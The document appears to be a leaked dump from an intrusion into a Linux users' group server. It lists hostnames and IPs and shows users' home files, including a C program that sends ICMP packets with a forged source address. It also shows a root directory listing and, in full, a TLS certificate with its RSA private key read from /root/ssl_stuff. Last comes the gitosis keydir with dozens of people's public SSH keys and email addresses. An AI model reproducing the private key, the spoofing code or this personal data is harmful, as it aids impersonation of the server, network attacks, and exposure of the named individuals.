p549AFF08,84.154.255.8
pool-74-111-23-114,74.111.23.114
tophost,85.94.194.111
vps1146,178.21.114.184
we-in-f108,173.194.66.108

/home/melug$ cat jom.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC//g6R1zRQwitxOTOVWr8ymKnA2Hp0PQ6iEU7XHdn1m5RIxvLrTLZfgJMnQD4rgMYwLZfmg8dQedSm8YLLSt0bNlhtcXPZrpDpHfbLszy28ZbTgo9s5wK2LNLPqT7Rm338RLvIwWk+dnIX0x7XXy+onwpsN2NlsghKViKr7NIjLHZ/amqzKS4+fFmOcTZ+2Tjz7mgnBHha0s8eeVcf1IWypTfXyK4DkL9j/mY0XNryqryKK+aV1+WJ5iW8SpU2oxmAEmnjGmMTza/D5x7fdMH9v4Njk3dgzlKlN3+azHdivwQ3ybqcr7TIDasonbZSaGmnfdo784jzPnjYLbIzeAqL j0m@messinalug.org


/home/nightolo/nightolo-quico$ cat ipspoof.c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>

#include <linux/ip.h>
#include <linux/icmp.h>
#include <linux/in.h>

struct pkt {
  struct iphdr iphdr;
  struct icmphdr icmphdr;

} __attribute((packed))__;


unsigned short checksum (unsigned short *, int);

unsigned short    /* this function generates header checksums */
checksum (unsigned short *buf, int nwords)
{
  unsigned long sum;
  for (sum = 0; nwords > 0; nwords--)
    sum += *buf++;
  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  return ~sum;
}

int
main(void)
{
  struct pkt spoofpkt;
  struct sockaddr_in address;
  int sockfd;


  spoofpkt.iphdr.version = 4;
  spoofpkt.iphdr.ihl = 5;
  spoofpkt.iphdr.tot_len = sizeof(struct iphdr) + sizeof(struct icmphdr);
  spoofpkt.iphdr.tos = 0;
  spoofpkt.iphdr.id = 0;
  spoofpkt.iphdr.frag_off = 0;
  spoofpkt.iphdr.ttl = MAXTTL;
  spoofpkt.iphdr.protocol = 1; /* icmp */
  spoofpkt.iphdr.check = 0; /* rivedere */
  spoofpkt.iphdr.saddr = inet_addr("192.168.1.69");
  spoofpkt.iphdr.daddr = inet_addr("192.168.1.1");

  spoofpkt.icmphdr.type = ICMP_ECHO;
  spoofpkt.icmphdr.code = 0;
  spoofpkt.icmphdr.checksum = 0;

  spoofpkt.icmphdr.checksum = checksum((unsigned short *) &spoofpkt.icmphdr, sizeof(struct icmphdr) >> 1);

  printf("checksum = %x\n", spoofpkt.icmphdr.checksum);


  if ( (sockfd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) <= 0 ) {
    perror("socket() error\n");
    exit(1);
  }

  address.sin_family = AF_INET;
  address.sin_addr.s_addr = inet_addr("192.168.1.1");

  if ( sendto (sockfd, (const void *) &spoofpkt, sizeof(spoofpkt), 0, (const struct sockaddr *) &address, sizeof(struct sockaddr)) < 0) {
    perror("sendto() error:\n");
    exit(1);
  }

  return 0;
}

/home/melug$ cat homes/formica/est/main.c
// Emergency Sat Tracking
// N.D.P. Il server si mette in ascolto sulla porta 1024 e crea un processo (tramite fork()) ad ogni connessione da remoto!
// Inoltre scrive su STDOUT tutto quello che riceve in ingresso

#include <sys/types.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void ServResponse(int);

int main(int argc, char *argv[])
{
  int list_fd, conn_fd;
  struct sockaddr_in serv_add, client;
  socklen_t len;
  pid_t pid;



/* Questa parte e' opzionale
  char usage[] = "* Emergency Sat Tracking * \n USAGE= est <ip-address>\n";
 
  if(argc == 1)
  {
    fprintf(stderr,"%s",usage);
    exit(-1);
  }

*/


// Net Initialization Section


  if ((list_fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  {
    perror("Socket_creation_error!;");
    exit(-1);
  }

  memset((void *) &serv_add, 0, sizeof(serv_add));
  serv_add.sin_family = AF_INET;
  serv_add.sin_port = htons(1024);
  serv_add.sin_addr.s_addr = htonl(INADDR_ANY);     // INADDR_ANY fa in modo che ascolti su di un indirizzo generico (0.0.0.0) o
                // su di un indirizzo specificato da riga di comando

  if(bind(list_fd,(struct sockaddr *)&serv_add, sizeof(serv_add)) < 0)  // Associa al socket creato l'indirizzo di cui sopra
  {
    perror("Bind_error!");
    exit(-1);
  }

  if(listen(list_fd, 100) < 0)
  {
    perror("Listen_error!");
    exit(-1);
  }

  fprintf(stdout, "\nEST - EMERGENCY SAT TRACKING SERVER. Listening on port 1024... DONE!\n");

// End

// Concurrent section

  while(1)
  {
    len = sizeof(client);
    if((conn_fd = accept(list_fd, NULL,NULL)) < 0)
    {
      perror("Accept_error");
      exit(-1);
    }

    if((pid = fork()) < 0)
    {
      perror("Fork_error!");
      exit(-1);
    }

    if(pid == 0)      // Se èil processo FIGLIO chiude la copia di list_fd e Risponde
    {
      close(list_fd);
      ServResponse(conn_fd);
      exit(0);
    }
 
    else        // Altrimenti èil PADRE
    {
      close(conn_fd);
    }
  }
}

void ServResponse(int conn_fd)
{
  char buffer[100];
  int nread;
  while((nread = read(conn_fd,buffer,100)) != 0)
  {
    fprintf(stdout,"%s\n", buffer);
  }
}



$ ls -al /root
total 124
drwxr-xr-x 12 root root  4096 Dec 21 16:11 .
drwxr-xr-x 22 root root  4096 Feb 11  2011 ..
drwx------  2 root root  4096 Dec  3  2011 .aptitude
-rw-------  1 root root  8426 Dec 20  2011 .bash_history
-rw-r--r--  1 root root   412 Dec 15  2004 .bashrc
drwx------  3 root root  4096 Apr 26  2011 .config
drwxr-xr-x  2 root root  4096 Feb 10  2011 .debtags
-rw-r--r--  1 root root   541 Feb 10  2011 .htoprc
-rw-------  1 root root  2474 Nov 27  2011 .joe_state
-rw-------  1 root root   328 Dec  2  2011 .lesshst
drwxr-xr-x  2 root root  4096 Dec 21  2011 .lftp
drwx------  2 root root  4096 Nov 27  2011 .mc
-rw-------  1 root root  5337 May  1  2011 .mysql_history
-rw-------  1 root root    16 Feb 11  2011 .nano_history
-rw-r--r--  1 root root   140 Nov 19  2007 .profile
-rw-------  1 root root  1024 Feb 28  2011 .rnd
dr-x------  2 root root  4096 Nov 27 11:17 .ssh
drwxr-xr-x  2 root root  4096 Sep 24 09:15 .vim
-rw-------  1 root root 19445 Dec 21 16:11 .viminfo
-rw-r--r--  1 root root    52 Mar 31  2011 .vimrc
drwx------  2 root root  4096 Dec 27  2010 Mail
drwxr-xr-x  4 root root  4096 Jan 18  2011 gitosis-admin
-rw-r-----  1 root root  2057 Feb 11  2011 install.log
drwxr-xr-x  2 root root  4096 Feb 28  2011 ssl_stuff

$ ls /root/ssl_stuff
server.crt  server.key

$ cat /root/ssl_stuff/*
-----BEGIN CERTIFICATE-----
MIIDeDCCAuGgAwIBAgIJAJ3Pud+OA2M0MA0GCSqGSIb3DQEBBQUAMIGFMQswCQYD
VQQGEwJORTESMBAGA1UECBMJQW1zdGVyZGFtMRIwEAYDVQQHEwlBbXN0ZXJkYW0x
ETAPBgNVBAoTCGR5bmUub3JnMRowGAYDVQQDExFSb2JlcnQgSi4gTmV3bWFyazEf
MB0GCSqGSIb3DQEJARYQbmV3bWFya0BkeW5lLm9yZzAeFw0xMTAyMjgxMjA2MTha
Fw0xMTAzMzAxMjA2MThaMIGFMQswCQYDVQQGEwJORTESMBAGA1UECBMJQW1zdGVy
ZGFtMRIwEAYDVQQHEwlBbXN0ZXJkYW0xETAPBgNVBAoTCGR5bmUub3JnMRowGAYD
VQQDExFSb2JlcnQgSi4gTmV3bWFyazEfMB0GCSqGSIb3DQEJARYQbmV3bWFya0Bk
eW5lLm9yZzCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAuJSpyd2dJLlitwTq
6oESpxJJZv4yGOciKYAZVltBRQ2IUJsM25F06GIBlVpKsyF7xcievI/DOSIunhzs
chQATeXuvLbFEh5Pnu6XbG5ZYrNzg6NnRdgoyWvp1jvuF0m/YBSNSXtX1a1loKjs
dLBP+SeYYLfy8z6tyfE+kC8B3BUCAwEAAaOB7TCB6jAdBgNVHQ4EFgQUOMSyyMfJ
iYS48APxmauzsNd4akMwgboGA1UdIwSBsjCBr4AUOMSyyMfJiYS48APxmauzsNd4
akOhgYukgYgwgYUxCzAJBgNVBAYTAk5FMRIwEAYDVQQIEwlBbXN0ZXJkYW0xEjAQ
BgNVBAcTCUFtc3RlcmRhbTERMA8GA1UEChMIZHluZS5vcmcxGjAYBgNVBAMTEVJv
YmVydCBKLiBOZXdtYXJrMR8wHQYJKoZIhvcNAQkBFhBuZXdtYXJrQGR5bmUub3Jn
ggkAnc+5344DYzQwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOBgQBREdl/
i6Yo1QECKhF5fwb56NyY0hol0TWISUPZxGe8xGikc6j7KOAtwlplVLIXLTefSIfY
nr3+kkZqL1Lh2kwv87XgTC7AcSvqbs/+s71tBjU/pIEZkCOMk26vqNdguk4LWP5H
5+2U1+6eN97eusRKzLQ9gLaHIVjjgGVfsK8CfA==
-----END CERTIFICATE-----
-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQC4lKnJ3Z0kuWK3BOrqgRKnEklm/jIY5yIpgBlWW0FFDYhQmwzb
kXToYgGVWkqzIXvFyJ68j8M5Ii6eHOxyFABN5e68tsUSHk+e7pdsbllis3ODo2dF
2CjJa+nWO+4XSb9gFI1Je1fVrWWgqOx0sE/5J5hgt/LzPq3J8T6QLwHcFQIDAQAB
AoGAPsiyiCuNjDRS05YkoeeNhK6/sPy95aKZCCy+cZVQukBEIcbbtMPhVDoh979i
sVOuWjRHajQsX361BKsp8hPDliefUa24n3CkgEfFhQxYoLqMkUqgFiySXro5gTYP
RNxd5Tei7O5IlD8aADp+fGwMT5Udc0lNRXkJ70fxm+5bvHECQQDi8OGN7IJZuVhp
d+EMdckkfHEM1H3zfJeTPc3jbw6RjU66mSCN2gJoIonV6JVGu4H6DzymLDQMAXN3
KGcpHsqPAkEA0Dc3BOXS3ZOlgxTU/vhZt5p3yz7wWuewh8bGEL0ykjiSjRQf6RB4
F3v3H3eNKIbH6qQxRG/le1myGOBTMUERGwJBANyps+e4DJcJrXn/4oenD8m2ZoY/
J6jVgNzev49hsRy99ctikVDcpnJzAutHl76LHDr1DdfWK1VxI8C9PHGzSukCQF8E
Q2xNwKty3D30PLrZ9H8v02kBoMerIUjksbAj1rcZb+9HdsRxyovU+1H1yYnr78Ep
Cn6TnaJrrTVi8TPx4G8CQQCX1hacywJHBNzFgl2ppSxD9jVG1iplxgWesq8/pC8J
7DBtTL4TkDV79DD4DD4JRaQsOG5CgLT+9sEU/C4M+B90
-----END RSA PRIVATE KEY-----

$ ls -al /root/gitosis-admin/keydir
total 268
drwxr-xr-x 2 root root 4096 Jan 18  2012 .
drwxr-xr-x 4 root root 4096 Jan 18  2012 ..
-rw-r--r-- 1 root root  793 Jan 18  2012 acracia.pub
-rw-r--r-- 1 root root  410 Jan 18  2012 aleray.pub
-rw-r--r-- 1 root root  600 Jan 18  2012 alex.pub
-rw-r--r-- 1 root root  232 Jan 18  2012 alice.pub
-rw-r--r-- 1 root root 1008 Jan 18  2012 anathema.pub
-rw-r--r-- 1 root root  616 Jan 18  2012 andy.pub
-rw-r--r-- 1 root root  789 Jan 18  2012 asbesto.pub
-rw-r--r-- 1 root root  397 Jan 18  2012 blended.pub
-rw-r--r-- 1 root root  396 Jan 18  2012 boyska.pub
-rw-r--r-- 1 root root 2879 Jan 18  2012 bucciarati.pub
-rw-r--r-- 1 root root  393 Jan 18  2012 buzz.pub
-rw-r--r-- 1 root root  397 Jan 18  2012 caedes.pub
-rw-r--r-- 1 root root  398 Jan 18  2012 ciaby.pub
-rw-r--r-- 1 root root  392 Jan 18  2012 crash.pub
-rw-r--r-- 1 root root  208 Jan 18  2012 dandennedy.pub
-rw-r--r-- 1 root root  598 Jan 18  2012 duy.pub
-rw-r--r-- 1 root root  399 Jan 18  2012 extraspecialbitter.pub
-rw-r--r-- 1 root root  393 Jan 18  2012 fred_99.pub
-rw-r--r-- 1 root root  406 Jan 18  2012 gabriele.pub
-rw-r--r-- 1 root root  392 Jan 18  2012 gisle.pub
-rw-r--r-- 1 root root  733 Jan 18  2012 godog.pub
-rw-r--r-- 1 root root  600 Jan 18  2012 goil.pub
-rw-r--r-- 1 root root  393 Jan 18  2012 hedde.pub
-rw-r--r-- 1 root root  734 Jan 18  2012 hellekin.pub
-rw-r--r-- 1 root root  625 Jan 18  2012 igor.pub
-rw-r--r-- 1 root root  738 Jan 18  2012 jaromil.pub
-rw-r--r-- 1 root root  396 Jan 18  2012 jayeola.pub
-rw-r--r-- 1 root root  396 Jan 18  2012 jebba.pub
-rw-r--r-- 1 root root  389 Jan 18  2012 jisis.pub
-rw-r--r-- 1 root root  413 Jan 18  2012 junichiro.pub
-rw-r--r-- 1 root root  223 Jan 18  2012 katolaz.pub
-rw-r--r-- 1 root root  395 Jan 18  2012 lluis.pub
-rw-r--r-- 1 root root  422 Jan 18  2012 locasto.pub
-rw-r--r-- 1 root root  393 Jan 18  2012 loupgarou.pub
-rw-r--r-- 1 root root  394 Jan 18  2012 lxo.pub
-rw-r--r-- 1 root root  604 Jan 18  2012 maksim.pub
-rw-r--r-- 1 root root  398 Jan 18  2012 mancausoft.pub
-rw-r--r-- 1 root root  391 Jan 18  2012 marko.pub
-rw-r--r-- 1 root root  399 Jan 18  2012 matthijs.pub
-rw-r--r-- 1 root root  397 Jan 18  2012 meinhard.pub
-rw-r--r-- 1 root root  812 Jan 18  2012 newmark.pub
-rw-r--r-- 1 root root 1010 Jan 18  2012 niels.pub
-rw-r--r-- 1 root root  605 Jan 18  2012 night.pub
-rw-r--r-- 1 root root  602 Jan 18  2012 nignux.pub
-rw-r--r-- 1 root root  226 Jan 18  2012 pallotron.pub
-rw-r--r-- 1 root root  801 Jan 18  2012 psy0rz.pub
-rw-r--r-- 1 root root  618 Jan 18  2012 quico-test.pub
-rw-r--r-- 1 root root  618 Jan 18  2012 quico.pub
-rw-r--r-- 1 root root  388 Jan 18  2012 r7.pub
-rw-r--r-- 1 root root  390 Jan 18  2012 rama.pub
-rw-r--r-- 1 root root  966 Jan 18  2012 robin.pub
-rw-r--r-- 1 root root  399 Jan 18  2012 rspindler.pub
-rw-r--r-- 1 root root  442 Jan 18  2012 sand.pub
-rw-r--r-- 1 root root  616 Jan 18  2012 shammash.pub
-rw-r--r-- 1 root root  401 Jan 18  2012 simon.pub
-rw-r--r-- 1 root root  620 Jan 18  2012 stevo32.pub
-rw-r--r-- 1 root root  589 Jan 18  2012 sucalora.pub
-rw-r--r-- 1 root root  617 Jan 18  2012 tamarindo-test.pub
-rw-r--r-- 1 root root  419 Jan 18  2012 tati.pub
-rw-r--r-- 1 root root  408 Jan 18  2012 topi.pub
-rw-r--r-- 1 root root  602 Jan 18  2012 ultrotter.pub
-rw-r--r-- 1 root root 1113 Jan 18  2012 vasco.pub
-rw-r--r-- 1 root root  395 Jan 18  2012 vlax.pub
-rw-r--r-- 1 root root  398 Jan 18  2012 willy.pub
-rw-r--r-- 1 root root 1211 Jan 18  2012 xant.pub

$ cat /root/gitosis-admin/keydir/*
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAP801oCdgPFhAgl6OnS/Ql7Nm02mt/oreUTSYOI88HcBNMck850y7OT6E6i78vH2tKrAlr1O4lEAA6tl5u+1tpkV30MbVy73lK7k0icbx5PczZKk1bIIntYLmRhPnbmca24ixLI6HGaFnxe+gFR8xdRNKqGhpk4LojEF+xq215koOyYBsgG/w+z/djgczzdEpExPRd1atpQAxS+vJCkv31AiZkEA7i1MNC72A8WtdkN2sZVDWdHOcTjTBtW+UY1iDDE010WDVqpBJ1zKaqbC7se/gVEusLdqXjN1oPr9yUyUel9DN0dsWBq5Y0SU4+pokXLfqxKb9o9qsTgSFuoiGvs= tatiana@omelas
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAu0ICQhipao7Z6RmgbZy9MVm0VlK7GPnVs0Op4uu7rFE7x+7Zl2ZYHQPh3mpEMulauBtakLq/+czrlyLFiJgugKQS/SihxQmZ2YChjYXoyyh7nIS1f7ctsy5TRqB2vOcBFbk0s1H4xA4YnxDff7r2fA5u1mnS3Wyv1th+fllNSIFwadmc8uK4AcdvO4eu/0CMEZ3fb5KblxwEZzb7ncUAj2VbDIJRgfSNDsMRhx0lEZ0enTqkOD1vDi9R3J/emvfUF9h+YjN5ZJ5iO+9jeawdoRCGr+vty77U4rLjcIefakQ6XAKo+tI9o/h/7EMSU6hLsr/GRWGQkeGGjJp6BBWY4Q== infopoint@infopoint
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxKnLFoHoXvhBcDgk1aF4j7IW3qH3y/NAgM90jNVeIuqu7F/Lbqsq+FCkQ3m+1szMeyEgGl57EBMrtboRjJ5qirHgQy+awrQM9J9mly2sBuPc9/suRiiuCbjKqNoBP2rvyGN0g56rDug7hczBOStQbt69SZZP7tFfsMrOqbPPHsBCoa7Eg0iWkqJnSzki/zLeGZ3cFoVg8ck//irck6axUzFC9AsJzebaGNzLsXb83hC79n45FZ+/FlHJXR4hxeZZPIpe6UPrmtkPEPrt/9uMMPoZZe/l9FO96b0mKkkbIwk9sNQoeK8IwlZwxNDmXAUuO0p5VL9R4ch+CEpTKP520Q== alexandre@alexandreleray.com
ssh-dss AAAAB3NzaC1kc3MAAACBANoGOiEomGx1cWSSDcxrq8U2g2dbTiDCG/5v2g009NHPKmJ+KRcu0WzDcBLM6vWqYn3FBjz1tKX2bFOuFR9ENfRat/WAVv8TZv+zPyJkuVGMQUWnQcf5t38dpU1mVX/w44cI7sHLkPvMzMQZdcCpnOuAONQTR7SvJZ6XwzcSZbKxAAAAFQDdLbKlzdlzRq8YMKbcKaramebvCwAAAIBJZQ/qARQlb5bg7v3djB3etClq0hO/DUXC0aRoAFEFnRKrG0zdchp8q4ov51Mdn4QbjSCVJEs9df5oS6dJWUyc8eZ6QH4NVyzibxlEmdVPw+q65ueKgmS1X0YMeeGs2f0DGRx/cjHTKCusk/esX9wR9+P8Bva+c+YhuUmtb2nzdQAAAIB14ey4rweejTniKdwQXBB86TjOG9W/7zk3G/x/ajRuWlwLqVsd02IoUJQrFKleEUxxVIa9XQexONh9uLQ4l749+QVAZTnwC6HAfrntt1fNLNnj52RuQwB04K1xfmYfpTao/KskC90VZY1cOnrzHWqugG7bz5jXc8LeowTc9gHh4A== alex@toast
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAsu/9+L+XMEsU0MTSS05AVASpe8xOxod3qsKCYFdOdkqgec7T7Mcfgx5Dl+Musgzj4q7OThSkrvV/wo1LxpYXnbMPnAcrOwJ+nK0bVaLNlcRqfUG4ZIMxiRUThepN2+K0SCwjh2xNm1kPTbMWgXRGVokK++rAlTwSHVUBfwiBJkE= alice@m5.notomorrow.de
ssh-dss AAAAB3NzaC1kc3MAAACBAPR8IfQQUkc878B28nL0I9w0nRSyATJktn3PoIYZEKFR1dGw8KoSrZ6WhgyW92qv/Gv1t6xNf6rdQdaJRQqAIHIju8i5BKGdSbL7dPqYFkoW8JmHmBkt6s73ytUQGu6fzVl71QKZgc41HpCMrXV9n9U8QboR5rGrI5liUHAEz6i3AAAAFQD7QP8lZoBNRa1fIm0FObfYkzl18QAAAIB7B9i/y0QqpJJyTYqFaYTOTY3WbywRl9ObVqVTl1O0REs59I6ohHg/TMQP+v5JeOcZu2Gru3vTz1O/7XoM/cozfN3K+JHMw1OQP4NSrXycXkC5QAfkBXUF6Agfkhx0LCReVsCExBcLOPuDhIdKCuHXyg3szzcKvaN3j7zVI0CK4QAAAIEAuToPNkwBiARchXaf5Qrg3cOPWgBsl1eU+EtA73Nc9q2AATjk/vDtcQoQ42JWhIt0AjpjYjCZIQBwsyJIrixlUonOrU3oKskYTIyXDi27i6Le67C5laONbHxWSbPyijbQ/L7LaqTsz0KAQR62UlcZGO9nYGqjsxKJXqy9krCl+A0= anathema@cryarcher
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDtzkN8jFKYWUTWLLXEs+jU9yE13eJf+Jn2KjUO6zUPcBF1ecxkOFBkqDVoasrf7byh8IzpCPhfAi4WhhOtcSA5qz258DRihnms6HK4Qjcxm40h2PgRb2ilOuAdjTtfIZRPDQBZJvuRzcO54DsvQY5CNe1EEYlumIq9cJJXd96s2F5DGdDK4vh1ataeGsWt9sLUfYE1lW19ItC9CEYrwok7imFEu/h4q0O3wfGKb6so5pazRsayG99ez3/sr7ISGvYj59BssACCk/Gpj3IbBiBTDORG2qcmAo1aMZBGlPSO6CccNvJyYQlzr8HgoP3glEqON1GyseliHo9WAHvGNgw3 anathema@cryarcher
ssh-dss AAAAB3NzaC1kc3MAAACBAOqx+FSu8sys0nAJZM51B3wQPeJ3w67HAhKslfFtpIQ0e4BJy1iltTUXV+9pRi9K7kdLhCxbX7QocT+78Pd7GjBcPGOKITlim+MfMhw0O2SEjbjVw93/w8HHxiN3WewTQVfHE1bYHjTlvi0TMgJBwvvbX6SGbTvDIlmck2wzqaNDAAAAFQC2rMuDZWDAC5a+F/wFmz01pyu3HQAAAIA+Eo10oTYPyHAststJyE0R/PHGTMMhm9gLMGrtD/VzdAdwYz3IGwOy6ASntPfwQ8X08WyBrRnDnyzw/dUyUW+Or0ZwX3+ey8NAdJcNm2SltXXx9oGLqpQLped6y7uk/1LIAVES7gEfZk1w7xqEVLE6RbmCQrxnYw3vy7o8UbMe8wAAAIEA41hS9eLu904WUCtaLDpiFJFzdyN/JLFiH65oC6mluN0fMLKxvoMyG52nBbolzjhKWBpz8UiLB//HIaS4qZv0IEYip3q0RHwSDsvqZWu3AVcQqywGQx6dSH0jXZ1Cb3sCIp1A6717Kf1XXW/jrW+o7dxPOv2OY7uSK6EX52Ovvps= andy@ve74.bigbox.eonis.net
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA8zvZyYfQ3VxCnq64fVJloHoDUgag57dQM7W/5/VXX7KoSN6/8EIN/85hiI8X+mHC/u0+0nAO29yMz3ZmWYthSNVjx3vXCnOI7fu32iiGoPcXFc2UVYjpzYNQGTvhH8+OE/cEknLr6jHE7/SSUO1pPBUG/IuxtvXpkHC/t4mWPDZJ1dZkQD934JUb+LdRxzJgJgtd0cg7kwM0K9Gx91HvAtGU6Gkokb2scRVtFHLLGNxkudHPth4GvTjl4m7F1XRHhq0cCZAdqtQ/vEjq7PxtTOVNUv4efyGyQgr2trLPV9i694u3cAzWNxc6qLXoqiX6cRJCKrJXA8Kruj7ZQmrwXQ== asbesto@lem
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsh3ExdWOaAd2SgZDK16oxFkxZhP+pCFzKloZ1x18G2RtEBAczI/tWY3gnOwtyjYn9G09S+hhPLZix6tFHRhLtjZRr/QDjqk6L4imHFpx5gIV9uVS3CWndsGFjXTBm6+DN3P6t01kp8bzyBqOd7moMbHpGE4GVK8Ijd9TkqSB9Ma7kxSZRUtFcY+jAuU45itZl+on+vdLU7xBbiVwqBFeZxPzioi/0GBvHUazNXD4a3sWEOCbTgVxcehY8V7x/6y7GxTsLC7LImkD6bNniJxLbnc9Ow3LakWR+2j2LlOhhei3dLs8chni9V7aZuEbjs7g8oM+wzhxHw/xLmMWFpmkLw== asbesto@gemini
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAw77OxpfXzPMiSJj0OAE+RflKjDnfBPmJgkfQC0hjbHVjOY4CbcX08R7YdPuebm9v6aFHJUrSPhVIwiwCnh4caEKRo/ylimE80s8EvaU6UHq/no7Tkkx5OJDd0CAqCBZ1eKG2bn3aW6blJ8B6+51YZKllv4SFk25Lx5iMMU/jb8foZRWR6YdwDKtJp7rZwH52SeWkYIwmHl6u+PE9L0AcXpdyHfAeAYtd6uMnCpS9ffndEhLIbHYwB2zNXAZK4vU93dgm/GOKYAKbmguqi9ML2uo9S6TH0XkL8urvyPrecWM78lVJQEz4QmmwTklg/1JLg2eCO2QyKE6FR4giUAn5Nw== blended@mammete
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAx25SWWIdzm9qYee2lLiIXFoNt/Cwacc2p9TlMue15mQ0BZ7P0JSwzI9LesoHd7oFHKktBLr8G0B2xeEXbqNJYn24RTxurTd6X1M6/qNOmAFoXKITwDzvHoBPBz/fXCgBbW367CdCiQ9mJ7bNtwIUH2JxG5AZM8vsrjKc3b3GmQc+1n0SULbFNND8WxZjpixmrKXRUIUUlznq8WEWo1o7y4D+NgLYVas5mbiprmXj9lPVMI3rLVcBPEDFgf6P1fd1/Pm6UjfZWblLyjvB0322AlZqZGJCVi8e6xxRYgQUPCwc39wuj1Qt/QCTs3xNBqyaibo3J9yzlmz3DtVeFy6Ocw== davide@hal9000
ssh-dss AAAAB3NzaC1kc3MAAAIBAP8ICznrIU1r+JVDOkJY1EL+v/LeQiUd33Pr3uXqA9H4+Lt+eNYV9ep/Ll/0D0VoArTpMB20C0iQLnJgvjJ3rV15nTAvGehJX2B+LT50NH2Xd6GK3nv0K9c5fvhiAATmrZ72SpPmUylUtMheIgEkS+aUA+VEzIhKKtEKdihRFks2HqKNoXxnuXAfbKCEpAlfCv/ZSSRy5inoaIV2PSMcLECpgdvOQ9p5v2U3ug+l9FMRtTn5IAs4io/RkX09O3cWwUMfSGRitzK2wkAvYAUPYK1VMs83D8fUR/7URsszApePyDUiQheuOjmZFhAfS/n0beCPRaZV6sra6IH8WVFbXE1XcxooT+svch9xWQvQ8d5NCBtfKkiEJd1rsoZJekWO5PRvrsOusTrMORQV4qzvB3a5o2VthrlWCdJkabhUQ7TBQ+4aN0DqjTOSpg+Arsz6WFZL6MheODA/MuQwFlaFOankNSFfOSnZdrulC+tupV+JlpN8blU5G4GcMAGMR5glbuiQyOf4l4XnF/BlgujHcxkuWpaAPXtSjPmxZVAtnDqywrKoX25rowz3LNmXg1n2pelhfQKWPaT/kQd07e2qmdXyokAKkHMt17svPNwqfVwJdi1fltxnD6Kpr070tUE7vXZ0KpYtuICkygkusRi1rlQsqQTff0Llb2xJOg2iFGm/AAAAFQCgu5QvlNBF0cI9jSqW8mc+vc9XQQAAAgBGd0toMXJTgEWHn9UNCHmHxxT7FYyvMTpq8LrrPaI9e3PU/HUDtIqOCN/97m3Wm4Z+Bap9AoTf2iTgkb0JoGgI3NY/ewARU8GKazMdAotEUMJQWVSQvlJ8cRjU+0QaMt8YslZVrDJOSMQIb4XRgFOccUQgPgVuUxSw8cMkEp0h4dVAS2ELsnQe9Y9hY7k5RBwXQuY1XBX8wEwI7w5D+XT4C78VAE0Vblqls3EQxfyF9oF3MOmnPxu7cMbmI5+p13RSufKkbhfVnCjTjIUTACuV2OY5cdj5AL4LjMJB/N1CqTAPShmR+bDHYVXQOV7uYH/qiqfhgRBtHIFlQvt5H3HwUgi3Nj4bg53kXLS5Q20PdNfbhJjO+OGZsfvcMPIEpiiM4ofo95cCX5Mi3pHMRg4rI0jFvVbjB6zzRrw+q204PQm8gxPGxl0lFdOfg/Mxmk7McXAa9HgNUgGRvqY8QJLuL4+fCVBfQSRvT2tHYTzLv417A8NKlikJIF+HAy41g1hWW0sjGSXQUFlAAoIb4yOG4lU1FMFnOy+oXylcJLSPicsT8vtIJ2BEpPP/UWbwobAgfSV919xN3Ze8ZyTlg3kbtjihfiJKhdOglAwrov9zwKn7KorRDighjfgk3zEYG/XYIiGiLmJ27CKPpC3og+AzkqbSdDkyb0t88yIeuINbRwAAAgEAx/oP3D176GTIjPzRSIAsEe5GxDppXVRelwiI6x8lxMTWDG58gksotVlvL4Ztt+Y3WLtZU6kl47LrNhN77QFSKjQbSKf76AB6iRpQ+GZoig16ymY5xH39QCT15EzQQAeUyKuP7SrnHa2vwk6745n0hbIV8kbZUYH6p8K8BaFuVz8KlNlcnSdckyhPIqtYEjiOF4axi4EF0qfYjJatMBDdIXKofOe3FadSMLNugRCqedtQjULsR9sNHvvLQtwQT+MWo7hcRHPEl1d+WwwmfE0+CkqShkK+2PPM+h8bS/6k004zAwj5JdDY4JuBjz+bsr8LFIg5BaZwk4kaIJhZaJ/g3UEioAbKuM7ZRn6ZbyMAh2BqjZcA+ibylzrbaCw/U19qo1YbA79d7JWhCbd9dV9ptE18Ls3asetYw7uHMBlhcu9ORN5cpcOWuX34tdnUruidjE/mzrPtxRGbLmkXQEeCREImB+3cmL36xdrAJqx27ZaYK5S+Gv1QWMdPmSNUXyQOLGZrJ8KIoHAbiSPqPJEQO8dKEzUijuhyNoNRdXgn0//kcmHWhQgOB555mS48Ql9D8FLx8niWZ/ei9i94nTYBBIjlNQThd0ninrBYbOW8DL0DLkuVONLZEhxJWdsQ2jfabIbQnHEpchPhXd/UgL7Z4LAB6wGU9ZEO/GxLy6rwqiE= buccia@luckyland
